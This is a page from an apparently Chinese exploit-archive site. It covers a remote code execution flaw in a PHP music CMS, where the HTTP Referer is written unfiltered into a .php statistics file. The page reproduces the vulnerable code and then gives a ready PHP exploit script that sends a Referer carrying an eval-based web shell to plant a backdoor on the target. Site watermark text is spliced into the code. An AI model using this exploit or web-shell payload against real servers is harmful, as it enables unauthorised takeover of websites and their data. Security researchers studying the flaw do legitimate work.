首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
电子斗音乐get shell漏洞
来源:织梦 作者:织梦 发布时间:2009-11-26  
 

index.php line 10

$data_name=get_date();  
  
... ...  
  
$from=$_SERVER["HTTP_REFERER"];  
  
... ...  
  
if(file_exists("$sys_data_dir/stat/$data_name.php"))  
{  
$stat_data=file("$sys_data_dir/stat/$data_name.php");  
for($a=0;$a<count($stat_data);$a++)  
    {  
    $stat_info=explode("|",$stat_data[$a]);  
    if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)//如果此IP已经访问且访问时间小于访问记录时间,退出循环  
        {  
        break;  
        }  

织梦好,好织梦

    if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)//如果此IP已经访问但访问时间大于访问记录时间,进行写入操作  
        {  
        $tod_data=readfrom("$sys_data_dir/stat/$data_name.php");  
        $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$tod_data;  
        writeto("$sys_data_dir/stat/$data_name.php",$new_data);  
        break;  
        }
$data_name=get_date(); ... ... $from=$_SERVER["HTTP_REFERER"]; ... ... if(file_exists("$sys_data_dir/stat/$data_name.php")) { $stat_data=file("$sys_data_dir/stat/$data_name.php"); for($a=0;$a<count($stat_data);$a++)     {     $stat_info=explode("|",$stat_data[$a]);     if($stat_info[0]==$ip && $time_stamp-$stat_info[2]<$time_part)//如果此IP已经访问且访问时间小于访问记录时间,退出循环         {         break;         }     if($stat_info[0]==$ip && $time_stamp-$stat_info[2]>$time_part)//如果此IP已经访问但访问时间大于访问记录时间,进行写入操作         {         $tod_data=readfrom("$sys_data_dir/stat/$data_name.php");         $new_data="$ip|$data_name/$now_time|$time_stamp|$earth_ip|$from|\n".$tod_data;         writeto("$sys_data_dir/stat/$data_name.php",$new_data);         break;         }------------------------------------------------------------------------------------

织梦内容管理系统


伪造http_referer 写入得shell /data/stat/年-月-日.php
------------------------------------------------------------------------------------
EXP: 内容来自dedecms

<?  
$server = '';    //host  
$host = '';    //host  
$target = '/index.php';    //vul file  
$referer = '<?eval($_POST['CMD']);?>';    // Referer  
$port = 80;  
$fp = fsockopen($server, $port, $errno, $errstr, 30);  
if (!$fp)   
{  
echo "$errstr ($errno)<br />\n";  
}   
else   
{  
        $out = "GET $target HTTP/1.1\r\n";  
        $out .= "Host: $host\r\n";  
        $out .= "Cookie: ASPSESSIONIDSQTBQSDA=DFCAPKLBBFICDAFMHNKIGKEG\r\n";  
        $out .= "Referer: $referer\r\n";   dedecms.com
        $out .= "Connection: Close\r\n\r\n";  
        fwrite($fp, $out);  
        while (!feof($fp))   
        {  
                echo fgets($fp, 128);  
        }  
        fclose($fp);  
}  
?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Serenity Audio Player Playlist
·Oracle 9i XDB FTP UNLOCK Overf
·CA eTrust PestPatrol ActiveX C
·Microsoft IIS 5.0 IDQ Path Ove
·GlobalSCAPE Secure FTP Server
·Borland Interbase Create-Reque
·Novell eDirectory NDS Server H
·GAMSoft TelSrv 1.5 Username Bu
·Winamp Ultravox Streaming Meta
·RealPlayer ierpplug.dll Active
·HP OpenView Operations OVTrace
·Microsoft ASN.1 Library Bitstr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved